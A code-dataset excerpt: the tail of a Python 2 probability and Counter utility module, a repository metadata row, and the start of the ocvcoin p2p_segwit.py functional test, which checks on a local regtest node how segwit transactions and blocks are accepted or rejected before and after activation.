return sum
def __radd__(self, y):
"""Adding another counter to a counter increments the current counter
by the values stored in the second counter.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> a += b
>>> a['first']
1
"""
for key, value in y.items():
self[key] += value
def __add__( self, y ):
"""Adding two counters gives a counter with the union of all keys and
counts of the second added to counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a + b)['first']
1
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] + y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = y[key]
return addend
def __sub__( self, y ):
"""Subtracting a counter from another gives a counter with the union of all keys and
counts of the second subtracted from counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a - b)['first']
-5
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] - y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = -1 * y[key]
return addend
def raiseNotDefined():
print "Method not implemented: %s" % inspect.stack()[1][3]
sys.exit(1)
def normalize(vectorOrCounter):
"""normalize a vector or counter by dividing each value by the sum of all values
"""
normalizedCounter = Counter()
if type(vectorOrCounter) == type(normalizedCounter):
counter = vectorOrCounter
total = float(counter.totalCount())
if total == 0: return counter
for key in counter.keys():
value = counter[key]
normalizedCounter[key] = value / total
return normalizedCounter
else:
vector = vectorOrCounter
s = float(sum(vector))
if s == 0: return vector
return [el / s for el in vector]
def nSample(distribution, values, n):
if sum(distribution) != 1:
distribution = normalize(distribution)
rand = [random.random() for i in range(n)]
rand.sort()
samples = []
samplePos, distPos, cdf = 0,0, distribution[0]
while samplePos < n:
if rand[samplePos] < cdf:
samplePos += 1
samples.append(values[distPos])
else:
distPos += 1
cdf += distribution[distPos]
return samples
def sample(distribution, values = None):
if type(distribution) == Counter:
items = distribution.items()
distribution = [i[1] for i in items]
values = [i[0] for i in items]
if sum(distribution) != 1:
distribution = normalize(distribution)
choice = random.random()
i, total= 0, distribution[0]
while choice > total:
i += 1
total += distribution[i]
return values[i]
def sampleFromCounter(ctr):
items = ctr.items()
return sample([v for k,v in items], [k for k,v in items])
def getProbability(value, distribution, values):
"""Gives the probability of a value under a discrete distribution
defined by (distributions, values).
"""
total = 0.0
for prob, val in zip(distribution, values):
if val == value:
total += prob
return total
def flipCoin( p ):
r = random.random()
return r < p
def chooseFromDistribution( distribution ):
"Takes either a counter or a list of (prob, key) pairs and samples"
if type(distribution) == dict or type(distribution) == Counter:
return sample(distribution)
r = random.random()
base = 0.0
for prob, element in distribution:
base += prob
if r <= base: return element
def nearestPoint( pos ):
"""Finds the nearest grid point to a position (discretizes).
"""
( current_row, current_col ) = pos
grid_row = int( current_row + 0.5 )
grid_col = int( current_col + 0.5 )
return ( grid_row, grid_col )
def sign( x ):
"""Returns 1 or -1 depending on the sign of x
"""
if( x >= 0 ):
return 1
else:
return -1
def arrayInvert(array):
"""Inverts a matrix stored as a list of lists.
"""
result = [[] for i in array]
for outer in array:
for inner in range(len(outer)):
result[inner].append(outer[inner])
return result
def matrixAsList( matrix, value = True ):
"""Turns a matrix into a list of coordinates matching the specified value
"""
rows, cols = len( matrix ), len( matrix[0] )
cells = []
for row in range( rows ):
for col in range( cols ):
if matrix[row][col] == value:
cells.append( ( row, col ) )
return cells
def lookup(name, namespace):
"""Get a method or class from any imported module from its name.
Usage: lookup(functionName, globals())
"""
dots = name.count('.')
if dots > 0:
moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
module = __import__(moduleName)
return getattr(module, objName)
else:
modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
options = [getattr(module, name) for module in modules if name in dir(module)]
options += [obj[1] for obj in namespace.items() if obj[0] == name ]
if len(options) == 1: return options[0]
if len(options) > 1: raise Exception, 'Name conflict for %s'
raise Exception, '%s not found as a method or class' % name
def pause():
"""Pauses the output stream awaiting user feedback.
"""
print "<Press enter/return to continue>"
raw_input()
## code to handle timeouts
import signal
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
"timeout must be at least 1 second. WHY??"
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args):
if not 'SIGALRM' in dir(signal):
return self.function(*args)
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.timeout)
try:
result = self.function(*args)
finally:
signal.signal(signal.SIGALRM, old)
signal.alarm(0)
return result
| [
"[email protected]"
] | |
3691083811d7321c87cdbb05e8c670f027fec3f9 | 5167f77d96d1dc5412a8a0a91c95e3086acd05dc | /test/functional/p2p_segwit.py | ceccca331b56c3e9dca0b314718090ac21ff9ef9 | [
"MIT"
] | permissive | ocvcoin/ocvcoin | 04fb0cea7c11bf52e07ea06ddf9df89631eced5f | 79c3803e330f32ed50c02ae657ff9aded6297b9d | refs/heads/master | 2023-04-30T10:42:05.457630 | 2023-04-15T11:49:40 | 2023-04-15T11:49:40 | 406,011,904 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 100,563 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2020 The Ocvcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test segwit transactions and blocks on P2P network."""
from decimal import Decimal
import math
import random
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment, get_witness_script, WITNESS_COMMITMENT_HEADER
from test_framework.key import ECKey
from test_framework.messages import (
BIP125_SEQUENCE_NUMBER,
CBlock,
CBlockHeader,
CInv,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
CTxWitness,
MAX_BLOCK_BASE_SIZE,
MSG_BLOCK,
MSG_TX,
MSG_WITNESS_FLAG,
MSG_WITNESS_TX,
MSG_WTX,
NODE_NETWORK,
NODE_WITNESS,
msg_no_witness_block,
msg_getdata,
msg_headers,
msg_inv,
msg_tx,
msg_block,
msg_no_witness_tx,
ser_uint256,
ser_vector,
sha256,
tx_from_hex,
)
from test_framework.p2p import (
P2PInterface,
p2p_lock,
)
from test_framework.script import (
CScript,
CScriptNum,
CScriptOp,
MAX_SCRIPT_ELEMENT_SIZE,
OP_0,
OP_1,
OP_2,
OP_16,
OP_2DROP,
OP_CHECKMULTISIG,
OP_CHECKSIG,
OP_DROP,
OP_ELSE,
OP_ENDIF,
OP_IF,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SIGHASH_ANYONECANPAY,
SIGHASH_NONE,
SIGHASH_SINGLE,
SegwitV0SignatureHash,
LegacySignatureHash,
hash160,
)
from test_framework.script_util import (
key_to_p2wpkh_script,
keyhash_to_p2pkh_script,
script_to_p2sh_script,
script_to_p2wsh_script,
)
from test_framework.test_framework import OcvcoinTestFramework
from test_framework.util import (
assert_equal,
softfork_active,
hex_str_to_bytes,
assert_raises_rpc_error,
)
# The versionbit bit used to signal activation of SegWit
VB_WITNESS_BIT = 1
VB_TOP_BITS = 0x20000000
MAX_SIGOP_COST = 80000
SEGWIT_HEIGHT = 120
class UTXO():
"""Used to keep track of anyone-can-spend outputs that we can use in the tests."""
def __init__(self, sha256, n, value):
self.sha256 = sha256
self.n = n
self.nValue = value
def sign_p2pk_witness_input(script, tx_to, in_idx, hashtype, value, key):
"""Add signature for a P2PK witness program."""
tx_hash = SegwitV0SignatureHash(script, tx_to, in_idx, hashtype, value)
signature = key.sign_ecdsa(tx_hash) + chr(hashtype).encode('latin-1')
tx_to.wit.vtxinwit[in_idx].scriptWitness.stack = [signature, script]
tx_to.rehash()
def get_virtual_size(witness_block):
"""Calculate the virtual size of a witness block.
Virtual size is base + witness/4."""
base_size = len(witness_block.serialize(with_witness=False))
total_size = len(witness_block.serialize())
# the "+3" is so we round up
vsize = int((3 * base_size + total_size + 3) / 4)
return vsize
def test_transaction_acceptance(node, p2p, tx, with_witness, accepted, reason=None):
"""Send a transaction to the node and check that it's accepted to the mempool
- Submit the transaction over the p2p interface
- use the getrawmempool rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_tx(tx) if with_witness else msg_no_witness_tx(tx))
assert_equal(tx.hash in node.getrawmempool(), accepted)
def test_witness_block(node, p2p, block, accepted, with_witness=True, reason=None):
"""Send a block to the node and check that it's accepted
- Submit the block over the p2p interface
- use the getbestblockhash rpc to check for acceptance."""
reason = [reason] if reason else []
with node.assert_debug_log(expected_msgs=reason):
p2p.send_and_ping(msg_block(block) if with_witness else msg_no_witness_block(block))
assert_equal(node.getbestblockhash() == block.hash, accepted)
class TestP2PConn(P2PInterface):
def __init__(self, wtxidrelay=False):
super().__init__(wtxidrelay=wtxidrelay)
self.getdataset = set()
self.last_wtxidrelay = []
self.lastgetdata = []
self.wtxidrelay = wtxidrelay
# Don't send getdata message replies to invs automatically.
# We'll send the getdata messages explicitly in the test logic.
def on_inv(self, message):
pass
def on_getdata(self, message):
self.lastgetdata = message.inv
for inv in message.inv:
self.getdataset.add(inv.hash)
def on_wtxidrelay(self, message):
self.last_wtxidrelay.append(message)
def announce_tx_and_wait_for_getdata(self, tx, success=True, use_wtxid=False):
if success:
# sanity check
assert (self.wtxidrelay and use_wtxid) or (not self.wtxidrelay and not use_wtxid)
with p2p_lock:
self.last_message.pop("getdata", None)
if use_wtxid:
wtxid = tx.calc_sha256(True)
self.send_message(msg_inv(inv=[CInv(MSG_WTX, wtxid)]))
else:
self.send_message(msg_inv(inv=[CInv(MSG_TX, tx.sha256)]))
if success:
if use_wtxid:
self.wait_for_getdata([wtxid])
else:
self.wait_for_getdata([tx.sha256])
else:
time.sleep(5)
assert not self.last_message.get("getdata")
def announce_block_and_wait_for_getdata(self, block, use_header, timeout=60):
with p2p_lock:
self.last_message.pop("getdata", None)
self.last_message.pop("getheaders", None)
msg = msg_headers()
msg.headers = [CBlockHeader(block)]
if use_header:
self.send_message(msg)
else:
self.send_message(msg_inv(inv=[CInv(MSG_BLOCK, block.sha256)]))
self.wait_for_getheaders()
self.send_message(msg)
self.wait_for_getdata([block.sha256])
def request_block(self, blockhash, inv_type, timeout=60):
with p2p_lock:
self.last_message.pop("block", None)
self.send_message(msg_getdata(inv=[CInv(inv_type, blockhash)]))
self.wait_for_block(blockhash, timeout)
return self.last_message["block"].block
class SegWitTest(OcvcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
# This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
self.extra_args = [
["-acceptnonstdtxn=1", "-segwitheight={}".format(SEGWIT_HEIGHT), "[email protected]"],
["-acceptnonstdtxn=0", "-segwitheight={}".format(SEGWIT_HEIGHT)],
["-acceptnonstdtxn=1", "-segwitheight=-1"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 1)
self.connect_nodes(0, 2)
self.sync_all()
# Helper functions
def build_next_block(self, version=4):
"""Build a block on top of node0's tip."""
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount() + 1
block_time = self.nodes[0].getblockheader(tip)["mediantime"] + 1
block = create_block(int(tip, 16), create_coinbase(height), block_time)
block.nVersion = version
block.rehash()
return block
def update_witness_block_with_transactions(self, block, tx_list, nonce=0):
"""Add list of transactions to block, adds witness commitment, then solves."""
block.vtx.extend(tx_list)
add_witness_commitment(block, nonce)
block.solve()
def run_test(self):
# Setup the p2p connections
# self.test_node sets NODE_WITNESS|NODE_NETWORK
self.test_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.old_node sets only NODE_NETWORK
self.old_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK)
# self.std_node is for testing node1 (fRequireStandard=true)
self.std_node = self.nodes[1].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
# self.std_wtx_node is for testing node1 with wtxid relay
self.std_wtx_node = self.nodes[1].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
assert self.test_node.nServices & NODE_WITNESS != 0
# Keep a place to store utxo's that can be used in later tests
self.utxo = []
self.log.info("Starting tests before segwit activation")
self.segwit_active = False
self.test_non_witness_transaction()
self.test_v0_outputs_arent_spendable()
self.test_block_relay()
self.test_getblocktemplate_before_lockin()
self.test_unnecessary_witness_before_segwit_activation()
self.test_witness_tx_relay_before_segwit_activation()
self.test_standardness_v0()
self.log.info("Advancing to segwit activation")
self.advance_to_segwit_active()
# Segwit status 'active'
self.test_p2sh_witness()
self.test_witness_commitments()
self.test_block_malleability()
self.test_witness_block_size()
self.test_submit_block()
self.test_extra_witness_data()
self.test_max_witness_push_length()
self.test_max_witness_program_length()
self.test_witness_input_length()
self.test_block_relay()
self.test_tx_relay_after_segwit_activation()
self.test_standardness_v0()
self.test_segwit_versions()
self.test_premature_coinbase_witness_spend()
self.test_uncompressed_pubkey()
self.test_signature_version_1()
self.test_non_standard_witness_blinding()
self.test_non_standard_witness()
self.test_upgrade_after_activation()
self.test_witness_sigops()
self.test_superfluous_witness()
self.test_wtxid_relay()
# Individual tests
def subtest(func): # noqa: N805
"""Wraps the subtests for logging and state assertions."""
def func_wrapper(self, *args, **kwargs):
self.log.info("Subtest: {} (Segwit active = {})".format(func.__name__, self.segwit_active))
# Assert segwit status is as expected
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
func(self, *args, **kwargs)
# Each subtest should leave some utxos for the next subtest
assert self.utxo
self.sync_blocks()
# Assert segwit status is as expected at end of subtest
assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
return func_wrapper
@subtest # type: ignore
def test_non_witness_transaction(self):
"""See if sending a regular transaction works, and create a utxo to use in later tests."""
# Mine a block with an anyone-can-spend coinbase,
# let it mature, then try to spend it.
block = self.build_next_block(version=1)
block.solve()
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
txid = block.vtx[0].sha256
self.nodes[0].generate(99) # let the block mature
# Create a transaction that spends the coinbase
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(txid, 0), b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.calc_sha256()
# Check that serializing it with or without witness is the same
# This is a sanity check of our testing framework.
assert_equal(msg_no_witness_tx(tx).serialize(), msg_tx(tx).serialize())
self.test_node.send_and_ping(msg_tx(tx)) # make sure the block was processed
assert tx.hash in self.nodes[0].getrawmempool()
# Save this transaction for later
self.utxo.append(UTXO(tx.sha256, 0, 49 * 100000000))
self.nodes[0].generate(1)
@subtest # type: ignore
def test_unnecessary_witness_before_segwit_activation(self):
"""Verify that blocks with witnesses are rejected before activation."""
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)])]
# Verify the hash with witness differs from the txid
# (otherwise our testing framework must be broken!)
tx.rehash()
assert tx.sha256 != tx.calc_sha256(with_witness=True)
# Construct a segwit-signaling block that includes the transaction.
block = self.build_next_block(version=(VB_TOP_BITS | (1 << VB_WITNESS_BIT)))
self.update_witness_block_with_transactions(block, [tx])
# Sending witness data before activation is not allowed (anti-spam
# rule).
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, reason='unexpected-witness')
# But it should not be permanently marked bad...
# Resend without witness information.
self.test_node.send_and_ping(msg_no_witness_block(block)) # make sure the block was processed
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
@subtest # type: ignore
def test_block_relay(self):
"""Test that block requests to NODE_WITNESS peer are with MSG_WITNESS_FLAG.
This is true regardless of segwit activation.
Also test that we don't ask for blocks from unupgraded peers."""
blocktype = 2 | MSG_WITNESS_FLAG
# test_node has set NODE_WITNESS, so all getdata requests should be for
# witness blocks.
# Test announcing a block via inv results in a getdata, and that
# announcing a version 4 or random VB block with a header results in a getdata
block1 = self.build_next_block()
block1.solve()
self.test_node.announce_block_and_wait_for_getdata(block1, use_header=False)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block1, True)
block2 = self.build_next_block(version=4)
block2.solve()
self.test_node.announce_block_and_wait_for_getdata(block2, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block2, True)
block3 = self.build_next_block(version=(VB_TOP_BITS | (1 << 15)))
block3.solve()
self.test_node.announce_block_and_wait_for_getdata(block3, use_header=True)
assert self.test_node.last_message["getdata"].inv[0].type == blocktype
test_witness_block(self.nodes[0], self.test_node, block3, True)
# Check that we can getdata for witness blocks or regular blocks,
# and the right thing happens.
if not self.segwit_active:
# Before activation, we should be able to request old blocks with
# or without witness, and they should be the same.
chain_height = self.nodes[0].getblockcount()
# Pick 10 random blocks on main chain, and verify that getdata's
# for MSG_BLOCK, MSG_WITNESS_BLOCK, and rpc getblock() are equal.
all_heights = list(range(chain_height + 1))
random.shuffle(all_heights)
all_heights = all_heights[0:10]
for height in all_heights:
block_hash = self.nodes[0].getblockhash(height)
rpc_block = self.nodes[0].getblock(block_hash, False)
block_hash = int(block_hash, 16)
block = self.test_node.request_block(block_hash, 2)
wit_block = self.test_node.request_block(block_hash, 2 | MSG_WITNESS_FLAG)
assert_equal(block.serialize(), wit_block.serialize())
assert_equal(block.serialize(), hex_str_to_bytes(rpc_block))
else:
# After activation, witness blocks and non-witness blocks should
# be different. Verify rpc getblock() returns witness blocks, while
# getdata respects the requested type.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [])
# This gives us a witness commitment.
assert len(block.vtx[0].wit.vtxinwit) == 1
assert len(block.vtx[0].wit.vtxinwit[0].scriptWitness.stack) == 1
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to retrieve it...
rpc_block = self.nodes[0].getblock(block.hash, False)
non_wit_block = self.test_node.request_block(block.sha256, 2)
wit_block = self.test_node.request_block(block.sha256, 2 | MSG_WITNESS_FLAG)
assert_equal(wit_block.serialize(), hex_str_to_bytes(rpc_block))
assert_equal(wit_block.serialize(False), non_wit_block.serialize())
assert_equal(wit_block.serialize(), block.serialize())
# Test size, vsize, weight
rpc_details = self.nodes[0].getblock(block.hash, True)
assert_equal(rpc_details["size"], len(block.serialize()))
assert_equal(rpc_details["strippedsize"], len(block.serialize(False)))
weight = 3 * len(block.serialize(False)) + len(block.serialize())
assert_equal(rpc_details["weight"], weight)
# Upgraded node should not ask for blocks from unupgraded
block4 = self.build_next_block(version=4)
block4.solve()
self.old_node.getdataset = set()
# Blocks can be requested via direct-fetch (immediately upon processing the announcement)
# or via parallel download (with an indeterminate delay from processing the announcement)
# so to test that a block is NOT requested, we could guess a time period to sleep for,
# and then check. We can avoid the sleep() by taking advantage of transaction getdata's
# being processed after block getdata's, and announce a transaction as well,
# and then check to see if that particular getdata has been received.
# Since 0.14, inv's will only be responded to with a getheaders, so send a header
# to announce this block.
msg = msg_headers()
msg.headers = [CBlockHeader(block4)]
self.old_node.send_message(msg)
self.old_node.announce_tx_and_wait_for_getdata(block4.vtx[0])
assert block4.sha256 not in self.old_node.getdataset
@subtest # type: ignore
def test_v0_outputs_arent_spendable(self):
"""Test that v0 outputs aren't spendable before segwit activation.
~6 months after segwit activation, the SCRIPT_VERIFY_WITNESS flag was
backdated so that it applies to all blocks, going back to the genesis
block.
Consequently, version 0 witness outputs are never spendable without
witness, and so can't be spent before segwit activation (the point at which
blocks are permitted to contain witnesses)."""
# node2 doesn't need to be connected for this test.
# (If it's connected, node0 may propagate an invalid block to it over
# compact blocks and the nodes would have inconsistent tips.)
self.disconnect_nodes(0, 2)
# Create two outputs, a p2wsh and p2sh-p2wsh
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(script_pubkey)
value = self.utxo[0].nValue // 3
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b'')]
tx.vout = [CTxOut(value, script_pubkey), CTxOut(value, p2sh_script_pubkey)]
tx.vout.append(CTxOut(value, CScript([OP_TRUE])))
tx.rehash()
txid = tx.sha256
# Add it to a block
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# Verify that segwit isn't activated. A block serialized with witness
# should be rejected prior to activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# Now send the block without witness. It should be accepted
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=False)
# Now try to spend the outputs. This should fail since SCRIPT_VERIFY_WITNESS is always enabled.
p2wsh_tx = CTransaction()
p2wsh_tx.vin = [CTxIn(COutPoint(txid, 0), b'')]
p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2wsh_tx.rehash()
p2sh_p2wsh_tx = CTransaction()
p2sh_p2wsh_tx.vin = [CTxIn(COutPoint(txid, 1), CScript([script_pubkey]))]
p2sh_p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
p2sh_p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
p2sh_p2wsh_tx.rehash()
for tx in [p2wsh_tx, p2sh_p2wsh_tx]:
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
# When the block is serialized with a witness, the block will be rejected because witness
# data isn't allowed in blocks that don't commit to witness data.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
# When the block is serialized without witness, validation fails because the transaction is
# invalid (transactions are always validated with SCRIPT_VERIFY_WITNESS so a segwit v0 transaction
# without a witness is invalid).
# Note: The reject reason for this failure could be
# 'block-validation-failed' (if script check threads > 1) or
# 'non-mandatory-script-verify-flag (Witness program was passed an
# empty witness)' (otherwise).
# TODO: support multiple acceptable reject reasons.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=False)
self.connect_nodes(0, 2)
self.utxo.pop(0)
self.utxo.append(UTXO(txid, 2, value))
@subtest # type: ignore
def test_getblocktemplate_before_lockin(self):
txid = int(self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1), 16)
for node in [self.nodes[0], self.nodes[2]]:
gbt_results = node.getblocktemplate({"rules": ["segwit"]})
if node == self.nodes[2]:
# If this is a non-segwit node, we should not get a witness
# commitment.
assert 'default_witness_commitment' not in gbt_results
else:
# For segwit-aware nodes, check the witness
# commitment is correct.
assert 'default_witness_commitment' in gbt_results
witness_commitment = gbt_results['default_witness_commitment']
# Check that default_witness_commitment is present.
witness_root = CBlock.get_merkle_root([ser_uint256(0),
ser_uint256(txid)])
script = get_witness_script(witness_root, 0)
assert_equal(witness_commitment, script.hex())
# Clear out the mempool
self.nodes[0].generate(1)
self.sync_blocks()
@subtest # type: ignore
def test_witness_tx_relay_before_segwit_activation(self):
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected for premature-witness, but should
# not be added to recently rejected list.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
tx_value = tx.vout[0].nValue
# Verify that if a peer doesn't set nServices to include NODE_WITNESS,
# the getdata is just for the non-witness portion.
self.old_node.announce_tx_and_wait_for_getdata(tx)
assert self.old_node.last_message["getdata"].inv[0].type == MSG_TX
# Since we haven't delivered the tx yet, inv'ing the same tx from
# a witness transaction ought not result in a getdata.
self.test_node.announce_tx_and_wait_for_getdata(tx, success=False)
# Delivering this transaction with witness should fail (no matter who
# its from)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.old_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# But eliminating the witness should fix it
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Cleanup: mine the first transaction and update utxo
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx_hash, 0, tx_value))
@subtest # type: ignore
def test_standardness_v0(self):
"""Test V0 txout standardness.
V0 segwit outputs and inputs are always standard.
V0 segwit inputs may only be mined after activation, but not before."""
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
p2sh_script_pubkey = script_to_p2sh_script(witness_program)
# First prepare a p2sh output (so that spending it will pass standardness)
p2sh_tx = CTransaction()
p2sh_tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
p2sh_tx.vout = [CTxOut(self.utxo[0].nValue - 1000, p2sh_script_pubkey)]
p2sh_tx.rehash()
# Mine it on test_node to create the confirmed output.
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_tx, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Now test standardness of v0 P2WSH outputs.
# Start by creating a transaction with two outputs.
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(p2sh_tx.sha256, 0), CScript([witness_program]))]
tx.vout = [CTxOut(p2sh_tx.vout[0].nValue - 10000, script_pubkey)]
tx.vout.append(CTxOut(8000, script_pubkey)) # Might burn this later
tx.vin[0].nSequence = BIP125_SEQUENCE_NUMBER # Just to have the option to bump this tx from the mempool
tx.rehash()
# This is always accepted, since the mempool policy is to consider segwit as always active
# and thus allow segwit outputs
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=True)
# Now create something that looks like a P2PKH output. This won't be spendable.
witness_hash = sha256(witness_program)
script_pubkey = CScript([OP_0, hash160(witness_hash)])
tx2 = CTransaction()
# tx was accepted, so we spend the second output.
tx2.vin = [CTxIn(COutPoint(tx.sha256, 1), b"")]
tx2.vout = [CTxOut(7000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
# Now update self.utxo for later tests.
tx3 = CTransaction()
# tx and tx2 were both accepted. Don't bother trying to reclaim the
# P2PKH output; just send tx's first output back to an anyone-can-spend.
self.sync_mempools([self.nodes[0], self.nodes[1]])
tx3.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx3.vout = [CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))]
tx3.wit.vtxinwit.append(CTxInWitness())
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx3.rehash()
if not self.segwit_active:
# Just check mempool acceptance, but don't add the transaction to the mempool, since witness is disallowed
# in blocks and the tx is impossible to mine right now.
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00001000'),
},
}],
)
# Create the same output as tx3, but by replacing tx
tx3_out = tx3.vout[0]
tx3 = tx
tx3.vout = [tx3_out]
tx3.rehash()
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00011000'),
},
}],
)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
assert_equal(len(self.nodes[1].getrawmempool()), 0)
@subtest # type: ignore
def advance_to_segwit_active(self):
"""Mine enough blocks to activate segwit."""
assert not softfork_active(self.nodes[0], 'segwit')
height = self.nodes[0].getblockcount()
self.nodes[0].generate(SEGWIT_HEIGHT - height - 2)
assert not softfork_active(self.nodes[0], 'segwit')
self.nodes[0].generate(1)
assert softfork_active(self.nodes[0], 'segwit')
self.segwit_active = True
@subtest # type: ignore
def test_p2sh_witness(self):
"""Test P2SH wrapped witness programs."""
# Prepare the p2sh-wrapped witness output
witness_program = CScript([OP_DROP, OP_TRUE])
p2wsh_pubkey = script_to_p2wsh_script(witness_program)
script_pubkey = script_to_p2sh_script(p2wsh_pubkey)
script_sig = CScript([p2wsh_pubkey]) # a push of the redeem script
# Fund the P2SH output
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
